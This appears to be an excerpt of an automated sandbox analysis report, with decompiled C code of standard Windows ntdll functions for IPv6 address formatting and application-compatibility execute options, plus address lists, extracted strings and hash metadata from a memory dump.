                                                                                                                                                                                                              0x00c08ac7
                                                                                                                                                                                                              0x00c08ac5
                                                                                                                                                                                                              0x00c08ace
                                                                                                                                                                                                              0x00c51bc9
                                                                                                                                                                                                              0x00c51bce
                                                                                                                                                                                                              0x00c51bd2
                                                                                                                                                                                                              0x00c51bd2
                                                                                                                                                                                                              0x00c08ad8
                                                                                                                                                                                                              0x00c08aeb
                                                                                                                                                                                                              0x00c08aeb
                                                                                                                                                                                                              0x00c08af0
                                                                                                                                                                                                              0x00c08af4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c08af4
                                                                                                                                                                                                              0x00c08a42
                                                                                                                                                                                                              0x00c08926
                                                                                                                                                                                                              0x00c08929
                                                                                                                                                                                                              0x00c0892c
                                                                                                                                                                                                              0x00c0892d
                                                                                                                                                                                                              0x00c08930
                                                                                                                                                                                                              0x00c08935
                                                                                                                                                                                                              0x00c0893a
                                                                                                                                                                                                              0x00c08b51
                                                                                                                                                                                                              0x00c08940
                                                                                                                                                                                                              0x00c08954
                                                                                                                                                                                                              0x00c08954
                                                                                                                                                                                                              0x00c0895a
                                                                                                                                                                                                              0x00c51b63
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c08960
                                                                                                                                                                                                              0x00c08969
                                                                                                                                                                                                              0x00c08973
                                                                                                                                                                                                              0x00c08976
                                                                                                                                                                                                              0x00c08979
                                                                                                                                                                                                              0x00c0897e
                                                                                                                                                                                                              0x00c08981
                                                                                                                                                                                                              0x00c08981
                                                                                                                                                                                                              0x00c08986
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c51b6e
                                                                                                                                                                                                              0x00c51b74
                                                                                                                                                                                                              0x00c51b7b
                                                                                                                                                                                                              0x00c51b8f
                                                                                                                                                                                                              0x00c51b91
                                                                                                                                                                                                              0x00c51b91
                                                                                                                                                                                                              0x00c51b99
                                                                                                                                                                                                              0x00c51b9c
                                                                                                                                                                                                              0x00c51ba2
                                                                                                                                                                                                              0x00c51ba2
                                                                                                                                                                                                              0x00c0898c
                                                                                                                                                                                                              0x00c08992
                                                                                                                                                                                                              0x00c08999
                                                                                                                                                                                                              0x00c089ad
                                                                                                                                                                                                              0x00c51ba8
                                                                                                                                                                                                              0x00c51ba8
                                                                                                                                                                                                              0x00c089ad
                                                                                                                                                                                                              0x00c089b6
                                                                                                                                                                                                              0x00c089c8
                                                                                                                                                                                                              0x00c089cd
                                                                                                                                                                                                              0x00c089d0
                                                                                                                                                                                                              0x00c089d0
                                                                                                                                                                                                              0x00c089d6
                                                                                                                                                                                                              0x00c089e8
                                                                                                                                                                                                              0x00c089e8
                                                                                                                                                                                                              0x00c089ed
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c089ed
                                                                                                                                                                                                              0x00c0895a
                                                                                                                                                                                                              0x00c0883e
                                                                                                                                                                                                              0x00c08841
                                                                                                                                                                                                              0x00c08844
                                                                                                                                                                                                              0x00c08845
                                                                                                                                                                                                              0x00c08848
                                                                                                                                                                                                              0x00c0884d
                                                                                                                                                                                                              0x00c08852
                                                                                                                                                                                                              0x00c08b49
                                                                                                                                                                                                              0x00c08858
                                                                                                                                                                                                              0x00c0886c
                                                                                                                                                                                                              0x00c0886c
                                                                                                                                                                                                              0x00c08872
                                                                                                                                                                                                              0x00c51b0e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c08878
                                                                                                                                                                                                              0x00c08881
                                                                                                                                                                                                              0x00c0888b
                                                                                                                                                                                                              0x00c0888e
                                                                                                                                                                                                              0x00c08891
                                                                                                                                                                                                              0x00c08896
                                                                                                                                                                                                              0x00c08899
                                                                                                                                                                                                              0x00c08899
                                                                                                                                                                                                              0x00c0889e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c51b21
                                                                                                                                                                                                              0x00c51b27
                                                                                                                                                                                                              0x00c51b2e
                                                                                                                                                                                                              0x00c51b42
                                                                                                                                                                                                              0x00c51b44
                                                                                                                                                                                                              0x00c51b44
                                                                                                                                                                                                              0x00c51b4c
                                                                                                                                                                                                              0x00c51b4f
                                                                                                                                                                                                              0x00c51b55
                                                                                                                                                                                                              0x00c51b55
                                                                                                                                                                                                              0x00c088a4
                                                                                                                                                                                                              0x00c088aa
                                                                                                                                                                                                              0x00c088b1
                                                                                                                                                                                                              0x00c088c5
                                                                                                                                                                                                              0x00c51b5b
                                                                                                                                                                                                              0x00c51b5b
                                                                                                                                                                                                              0x00c088c5
                                                                                                                                                                                                              0x00c088ce
                                                                                                                                                                                                              0x00c088e0
                                                                                                                                                                                                              0x00c088e5
                                                                                                                                                                                                              0x00c088e8
                                                                                                                                                                                                              0x00c088e8
                                                                                                                                                                                                              0x00c088ee
                                                                                                                                                                                                              0x00c08900
                                                                                                                                                                                                              0x00c08900
                                                                                                                                                                                                              0x00c08905
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c08905

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00C08914
                                                                                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 00C089FC
                                                                                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 00C087E6
                                                                                                                                                                                                              • WindowsExcludedProcs, xrefs: 00C087C1
                                                                                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 00C08827
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _wcspbrk
                                                                                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                              • API String ID: 402402107-258546922
                                                                                                                                                                                                              • Opcode ID: 81b1ea864b30c3ea5ce2adf32dd7c3b45551937fa4c94bcafaae4203d00dc65b
                                                                                                                                                                                                              • Instruction ID: 6581c9c544c0c1c019d76119f95ce878d4d08f926b01ed243e0c3920fe5341a4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81b1ea864b30c3ea5ce2adf32dd7c3b45551937fa4c94bcafaae4203d00dc65b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18F1F7B6D00249EFCF11DF95C981AEEB7F8FF08300F1484AAE515A7251EB349A49DB60
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 38%
                                                                                                                                                                                                              			E00C213CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                                              				intOrPtr* _v16;
                                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                                              				intOrPtr _t71;
                                                                                                                                                                                                              				signed int _t78;
                                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                                              				char _t90;
                                                                                                                                                                                                              				signed int _t91;
                                                                                                                                                                                                              				signed int _t96;
                                                                                                                                                                                                              				intOrPtr _t108;
                                                                                                                                                                                                              				signed int _t114;
                                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                                              				intOrPtr _t128;
                                                                                                                                                                                                              				intOrPtr* _t129;
                                                                                                                                                                                                              				void* _t130;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t129 = _a4;
                                                                                                                                                                                                              				_t128 = _a8;
                                                                                                                                                                                                              				_t116 = 0;
                                                                                                                                                                                                              				_t71 = _t128 + 0x5c;
                                                                                                                                                                                                              				_v8 = 8;
                                                                                                                                                                                                              				_v20 = _t71;
                                                                                                                                                                                                              				if( *_t129 == 0) {
                                                                                                                                                                                                              					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                                                                              						if(_t96 != 0) {
                                                                                                                                                                                                              							L38:
                                                                                                                                                                                                              							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                              								_t86 = E00C17707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                                              								L36:
                                                                                                                                                                                                              								return _t128 + _t86 * 2;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                                                                              						if(_t114 == 0) {
                                                                                                                                                                                                              							L33:
                                                                                                                                                                                                              							_t115 = 0xbe2926;
                                                                                                                                                                                                              							L35:
                                                                                                                                                                                                              							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                              							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                              							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                              							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                                                                              							_t86 = E00C17707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                                                                              							goto L36;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_t114 != 0xffff) {
                                                                                                                                                                                                              							_t116 = 0;
                                                                                                                                                                                                              							goto L38;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if(_t114 != 0) {
                                                                                                                                                                                                              							_t115 = 0xbe9cac;
                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						goto L33;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                              					_a8 = _t116;
                                                                                                                                                                                                              					_a4 = _t116;
                                                                                                                                                                                                              					_v12 = _t116;
                                                                                                                                                                                                              					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                                                                              						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                                                                              							_v8 = 6;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t90 = _v8;
                                                                                                                                                                                                              					if(_t90 <= _t116) {
                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                              						if(_a8 - _a4 <= 1) {
                                                                                                                                                                                                              							_a8 = _t116;
                                                                                                                                                                                                              							_a4 = _t116;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						_t91 = 0;
                                                                                                                                                                                                              						if(_v8 <= _t116) {
                                                                                                                                                                                                              							L22:
                                                                                                                                                                                                              							if(_v8 < 8) {
                                                                                                                                                                                                              								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                                                                              								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                                                                              								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                                                                              								_t128 = _t128 + E00C17707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							return _t128;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                              							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                                                                              								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                                                                              									_push(":");
                                                                                                                                                                                                              									_push(_t71 - _t128 >> 1);
                                                                                                                                                                                                              									_push(_t128);
                                                                                                                                                                                                              									_t128 = _t128 + E00C17707() * 2;
                                                                                                                                                                                                              									_t71 = _v20;
                                                                                                                                                                                                              									_t130 = _t130 + 0xc;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t78 = E00C17707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                                                                              								_t130 = _t130 + 0x10;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_push(L"::");
                                                                                                                                                                                                              								_push(_t71 - _t128 >> 1);
                                                                                                                                                                                                              								_push(_t128);
                                                                                                                                                                                                              								_t78 = E00C17707();
                                                                                                                                                                                                              								_t130 = _t130 + 0xc;
                                                                                                                                                                                                              								_t91 = _a8 - 1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t91 = _t91 + 1;
                                                                                                                                                                                                              							_t128 = _t128 + _t78 * 2;
                                                                                                                                                                                                              							_t71 = _v20;
                                                                                                                                                                                                              							if(_t91 >= _v8) {
                                                                                                                                                                                                              								goto L22;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t116 = 0;
                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						_t108 = 1;
                                                                                                                                                                                                              						_v16 = _t129;
                                                                                                                                                                                                              						_v24 = _t90;
                                                                                                                                                                                                              						do {
                                                                                                                                                                                                              							if( *_v16 == _t116) {
                                                                                                                                                                                                              								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                                                                              									_a4 = _v12;
                                                                                                                                                                                                              									_a8 = _t108;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								_t116 = 0;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								_v12 = _t108;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_v16 = _v16 + 2;
                                                                                                                                                                                                              							_t108 = _t108 + 1;
                                                                                                                                                                                                              							_t26 =  &_v24;
                                                                                                                                                                                                              							 *_t26 = _v24 - 1;
                                                                                                                                                                                                              						} while ( *_t26 != 0);
                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}




















                                                                                                                                                                                                              0x00c213d5
                                                                                                                                                                                                              0x00c213d9
                                                                                                                                                                                                              0x00c213dc
                                                                                                                                                                                                              0x00c213de
                                                                                                                                                                                                              0x00c213e1
                                                                                                                                                                                                              0x00c213e8
                                                                                                                                                                                                              0x00c213ee
                                                                                                                                                                                                              0x00c4e8fd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4e921
                                                                                                                                                                                                              0x00c4e921
                                                                                                                                                                                                              0x00c4e928
                                                                                                                                                                                                              0x00c4e982
                                                                                                                                                                                                              0x00c4e98a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4e99a
                                                                                                                                                                                                              0x00c4e99e
                                                                                                                                                                                                              0x00c4e9a3
                                                                                                                                                                                                              0x00c4e9a8
                                                                                                                                                                                                              0x00c4e9b9
                                                                                                                                                                                                              0x00c4e978
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4e978
                                                                                                                                                                                                              0x00c4e98a
                                                                                                                                                                                                              0x00c4e92a
                                                                                                                                                                                                              0x00c4e931
                                                                                                                                                                                                              0x00c4e944
                                                                                                                                                                                                              0x00c4e944
                                                                                                                                                                                                              0x00c4e950
                                                                                                                                                                                                              0x00c4e954
                                                                                                                                                                                                              0x00c4e959
                                                                                                                                                                                                              0x00c4e95e
                                                                                                                                                                                                              0x00c4e963
                                                                                                                                                                                                              0x00c4e970
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4e975
                                                                                                                                                                                                              0x00c4e93b
                                                                                                                                                                                                              0x00c4e980
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4e980
                                                                                                                                                                                                              0x00c4e942
                                                                                                                                                                                                              0x00c4e94b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4e94b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c4e942
                                                                                                                                                                                                              0x00c213f4
                                                                                                                                                                                                              0x00c213f4
                                                                                                                                                                                                              0x00c213f9
                                                                                                                                                                                                              0x00c213fc
                                                                                                                                                                                                              0x00c213ff
                                                                                                                                                                                                              0x00c21406
                                                                                                                                                                                                              0x00c4e9cc
                                                                                                                                                                                                              0x00c4e9d2
                                                                                                                                                                                                              0x00c4e9d2
                                                                                                                                                                                                              0x00c4e9cc
                                                                                                                                                                                                              0x00c2140c
                                                                                                                                                                                                              0x00c21411
                                                                                                                                                                                                              0x00c21431
                                                                                                                                                                                                              0x00c2143a
                                                                                                                                                                                                              0x00c2143c
                                                                                                                                                                                                              0x00c2143f
                                                                                                                                                                                                              0x00c2143f
                                                                                                                                                                                                              0x00c21442
                                                                                                                                                                                                              0x00c21447
                                                                                                                                                                                                              0x00c214a8
                                                                                                                                                                                                              0x00c214ac
                                                                                                                                                                                                              0x00c4e9e2
                                                                                                                                                                                                              0x00c4e9e7
                                                                                                                                                                                                              0x00c4e9ec
                                                                                                                                                                                                              0x00c4ea05
                                                                                                                                                                                                              0x00c4ea05
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c21449
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c21449
                                                                                                                                                                                                              0x00c2144c
                                                                                                                                                                                                              0x00c21459
                                                                                                                                                                                                              0x00c21462
                                                                                                                                                                                                              0x00c21469
                                                                                                                                                                                                              0x00c2146a
                                                                                                                                                                                                              0x00c21470
                                                                                                                                                                                                              0x00c21473
                                                                                                                                                                                                              0x00c21476
                                                                                                                                                                                                              0x00c21476
                                                                                                                                                                                                              0x00c21490
                                                                                                                                                                                                              0x00c21495
                                                                                                                                                                                                              0x00c2138e
                                                                                                                                                                                                              0x00c21390
                                                                                                                                                                                                              0x00c21397
                                                                                                                                                                                                              0x00c21398
                                                                                                                                                                                                              0x00c21399
                                                                                                                                                                                                              0x00c213a1
                                                                                                                                                                                                              0x00c213a4
                                                                                                                                                                                                              0x00c213a4
                                                                                                                                                                                                              0x00c21498
                                                                                                                                                                                                              0x00c2149c
                                                                                                                                                                                                              0x00c2149f
                                                                                                                                                                                                              0x00c214a2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c214a4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c214a4
                                                                                                                                                                                                              0x00c21413
                                                                                                                                                                                                              0x00c21415
                                                                                                                                                                                                              0x00c21416
                                                                                                                                                                                                              0x00c21419
                                                                                                                                                                                                              0x00c2141c
                                                                                                                                                                                                              0x00c21422
                                                                                                                                                                                                              0x00c213b7
                                                                                                                                                                                                              0x00c213bc
                                                                                                                                                                                                              0x00c213bf
                                                                                                                                                                                                              0x00c213bf
                                                                                                                                                                                                              0x00c213c2
                                                                                                                                                                                                              0x00c21424
                                                                                                                                                                                                              0x00c21424
                                                                                                                                                                                                              0x00c21424
                                                                                                                                                                                                              0x00c21427
                                                                                                                                                                                                              0x00c2142b
                                                                                                                                                                                                              0x00c2142c
                                                                                                                                                                                                              0x00c2142c
                                                                                                                                                                                                              0x00c2142c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c2141c
                                                                                                                                                                                                              0x00c21411

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2205066899.0000000000BD0000.00000040.00000001.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205061481.0000000000BC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205153631.0000000000CB0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205158248.0000000000CC0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205163507.0000000000CC4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205168227.0000000000CC7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205172425.0000000000CD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000006.00000002.2205201256.0000000000D30000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                                                                                              • Opcode ID: 5d9cfb7bff5fae193b4deead39eb91584adf801c4ca78a9caf3fc26c4fea90d9
                                                                                                                                                                                                              • Instruction ID: 7abe7c34a8abecb924315df12978de2fc2a6b3c386e06ea83135a074f15314a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d9cfb7bff5fae193b4deead39eb91584adf801c4ca78a9caf3fc26c4fea90d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92613C71904665A6CB34DF5AD8808BEBBF5FFA5300B18C16DF8AA47980D3349B40DB60
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                                              			E00C17EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                              				char _v540;
                                                                                                                                                                                                              				unsigned int _v544;
                                                                                                                                                                                                              				signed int _v548;
                                                                                                                                                                                                              				intOrPtr _v552;
                                                                                                                                                                                                              				char _v556;
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                              				void* _t38;
                                                                                                                                                                                                              				unsigned int _t46;
                                                                                                                                                                                                              				unsigned int _t47;
                                                                                                                                                                                                              				unsigned int _t52;
                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                              				unsigned int _t62;
                                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                                              				signed int _t73;
                                                                                                                                                                                                              				void* _t74;
                                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                                              				void* _t77;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t33 =  *0xcc2088; // 0x777de364
                                                                                                                                                                                                              				_v8 = _t33 ^ _t73;
                                                                                                                                                                                                              				_v548 = _v548 & 0x00000000;
                                                                                                                                                                                                              				_t72 = _a4;
                                                                                                                                                                                                              				if(E00C17F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                                                                              					__eflags = _v548;
                                                                                                                                                                                                              					if(_v548 == 0) {
                                                                                                                                                                                                              						goto L1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t62 = _t72 + 0x24;
                                                                                                                                                                                                              					E00C33F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                                                                              					_t71 = 0x214;
                                                                                                                                                                                                              					_v544 = 0x214;
                                                                                                                                                                                                              					E00BEDFC0( &_v540, 0, 0x214);
                                                                                                                                                                                                              					_t75 = _t74 + 0x20;
                                                                                                                                                                                                              					_t46 =  *0xcc4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                                                                              					__eflags = _t46;
                                                                                                                                                                                                              					if(_t46 == 0) {
                                                                                                                                                                                                              						goto L1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t47 = _v544;
                                                                                                                                                                                                              					__eflags = _t47;
                                                                                                                                                                                                              					if(_t47 == 0) {
                                                                                                                                                                                                              						goto L1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags = _t47 - 0x214;
                                                                                                                                                                                                              					if(_t47 >= 0x214) {
                                                                                                                                                                                                              						goto L1;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_push(_t62);
                                                                                                                                                                                                              					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                                                                              					E00C33F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                                                                              					_t52 = E00BF0D27( &_v540, L"Execute=1");
                                                                                                                                                                                                              					_t76 = _t75 + 0x1c;
                                                                                                                                                                                                              					_push(_t62);
                                                                                                                                                                                                              					__eflags = _t52;
                                                                                                                                                                                                              					if(_t52 == 0) {
                                                                                                                                                                                                              						E00C33F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                                                                              						_t71 =  &_v540;
                                                                                                                                                                                                              						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                                                                              						_t77 = _t76 + 0x14;
                                                                                                                                                                                                              						_v552 = _t56;
                                                                                                                                                                                                              						__eflags = _t71 - _t56;
                                                                                                                                                                                                              						if(_t71 >= _t56) {
                                                                                                                                                                                                              							goto L1;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							goto L10;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							L10:
                                                                                                                                                                                                              							_t62 = E00BF8375(_t71, 0x20);
                                                                                                                                                                                                              							_pop(_t69);
                                                                                                                                                                                                              							__eflags = _t62;
                                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                                              								 *_t62 = 0;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							E00C33F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                                                                              							_t77 = _t77 + 0x10;
                                                                                                                                                                                                              							E00C5E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                                                                              							__eflags = _t62;
                                                                                                                                                                                                              							if(_t62 == 0) {
                                                                                                                                                                                                              								goto L1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t31 = _t62 + 2; // 0x2
                                                                                                                                                                                                              							_t71 = _t31;
                                                                                                                                                                                                              							__eflags = _t71 - _v552;
                                                                                                                                                                                                              							if(_t71 >= _v552) {
                                                                                                                                                                                                              								goto L1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                                                                              					_push(3);
                                                                                                                                                                                                              					_push(0x55);
                                                                                                                                                                                                              					E00C33F92();
                                                                                                                                                                                                              					_t38 = 1;
                                                                                                                                                                                                              					L2:
                                                                                                                                                                                                              					return E00BEE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				L1:
                                                                                                                                                                                                              				_t38 = 0;
                                                                                                                                                                                                              				goto L2;
                                                                                                                                                                                                              			}



























                                                                                                                                                                                                              0x00c17f08
                                                                                                                                                                                                              0x00c17f0f
                                                                                                                                                                                                              0x00c17f12
                                                                                                                                                                                                              0x00c17f1b
                                                                                                                                                                                                              0x00c17f31
                                                                                                                                                                                                              0x00c33ead
                                                                                                                                                                                                              0x00c33eb4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c33eba
                                                                                                                                                                                                              0x00c33ecd
                                                                                                                                                                                                              0x00c33ed2
                                                                                                                                                                                                              0x00c33ee1
                                                                                                                                                                                                              0x00c33ee7
                                                                                                                                                                                                              0x00c33eec
                                                                                                                                                                                                              0x00c33f12
                                                                                                                                                                                                              0x00c33f18
                                                                                                                                                                                                              0x00c33f1a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c33f20
                                                                                                                                                                                                              0x00c33f26
                                                                                                                                                                                                              0x00c33f28
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00c33f2e
                                                                                                                                                                                                              0x00c33f30
                                                                                                                                                                                                              0x00000000
